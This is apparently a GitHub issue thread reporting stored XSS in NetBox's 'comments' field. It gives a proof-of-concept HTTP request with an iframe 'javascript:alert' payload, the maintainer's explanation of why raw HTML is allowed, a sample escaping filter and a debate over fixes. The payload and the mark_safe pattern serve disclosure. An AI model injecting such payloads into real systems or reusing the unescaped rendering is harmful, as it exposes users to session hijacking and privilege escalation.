NetBox is vulnerable to stored XSS due to a lack of filtering of user-supplied input [Authenticated User]
Parameter:
name="comments" [works on all pages where the parameter is present]
PoC

```http
POST /dcim/sites/add/ HTTP/1.1
Host: xxx
User-Agent: xxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: xxx
Content-Type: multipart/form-data; boundary=---------------------------57052814523281
Content-Length: 2158
Connection: close
Cookie: csrftoken=xxx; sessionid=xxx
Upgrade-Insecure-Requests: 1

-----------------------------57052814523281
Content-Disposition: form-data; name="csrfmiddlewaretoken"

xxxx
<snipped>
-----------------------------57052814523281
Content-Disposition: form-data; name="comments"

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
-----------------------------57052814523281
Content-Disposition: form-data; name="_create"

-----------------------------57052814523281--
```
A CVE will be requested.
This is known and expected behavior. There was some discussion a while back (though I can't find a GitHub issue for it) where we decided to allow raw HTML in comment fields. The logic was that since only authenticated users are permitted to post content, the risk would be acceptable for most use cases.
```python
html = markdown(value, extensions=['mdx_gfm'])  # raw HTML in `value` passes through the Markdown renderer unchanged
return mark_safe(html)  # marks the result as safe, so Django's template engine does not auto-escape it
```
I don't have a strong opinion on this either way: We can leave it as-is, or we can disable HTML entirely and leave only GitHub-flavored Markdown (GFM) rendering. What I don't want to do is start maintaining a whitelist/blacklist of HTML tags that should or should not be permitted. That's a lot of overhead and frankly overkill given the type of content intended to be stored in these fields.
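One way to implement the "disable HTML entirely, keep GFM" option discussed above, as an added example that is not NetBox's code: a standard-library pre-filter that entity-escapes every raw tag in `value` before it reaches `markdown()`, while leaving Markdown syntax (blockquote `>`, emphasis, existing `&...;` references) untouched. The function name `neutralize_raw_html` is hypothetical; the trade-off is that Markdown autolinks written as `<https://...>` and tags inside code spans also end up escaped.

```python
from html import escape
from html.parser import HTMLParser


class RawHTMLNeutralizer(HTMLParser):
    """Re-emit input verbatim, but entity-escape every tag, comment and
    declaration so Markdown shows it as literal text instead of HTML."""

    def __init__(self):
        super().__init__(convert_charrefs=False)  # keep &amp; / &#169; as written
        self.out = []

    def handle_starttag(self, tag, attrs):
        # Raw source of the tag, so SRC="javascript:..." is escaped as a whole
        self.out.append(escape(self.get_starttag_text()))

    handle_startendtag = handle_starttag

    def handle_endtag(self, tag):
        self.out.append(escape(f"</{tag}>"))

    def handle_data(self, data):
        self.out.append(data)  # plain text, '>' blockquotes and 'a < b' pass through

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(escape(f"<!--{data}-->"))

    def handle_decl(self, decl):
        self.out.append(escape(f"<!{decl}>"))

    def handle_pi(self, data):
        self.out.append(escape(f"<?{data}>"))

    def unknown_decl(self, data):
        self.out.append(escape(f"<![{data}]>"))


def neutralize_raw_html(value: str) -> str:
    """Hypothetical pre-filter: run on `value` before it is passed to markdown()."""
    parser = RawHTMLNeutralizer()
    parser.feed(value)
    parser.close()
    return "".join(parser.out)
```

Fed the payload from the report above, the filter returns `&lt;IFRAME SRC=&quot;javascript:alert(&#x27;XSS&#x27;);&quot;&gt;&lt;/iframe&gt;`, which the Markdown renderer then emits as visible text rather than an element.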
It is not clear to me why an HTML component must be inserted in a comment function. A stored XSS can lead to privilege escalation, and therefore to the possibility of accessing administrative functions.
And yet, other users might need it. I'm not going to remove a piece of functionality from the application without some discussion. Hence the "gathering feedback" tag.
What about creating a new permission that allows users to use HTML or not (only Markdown or whatever)?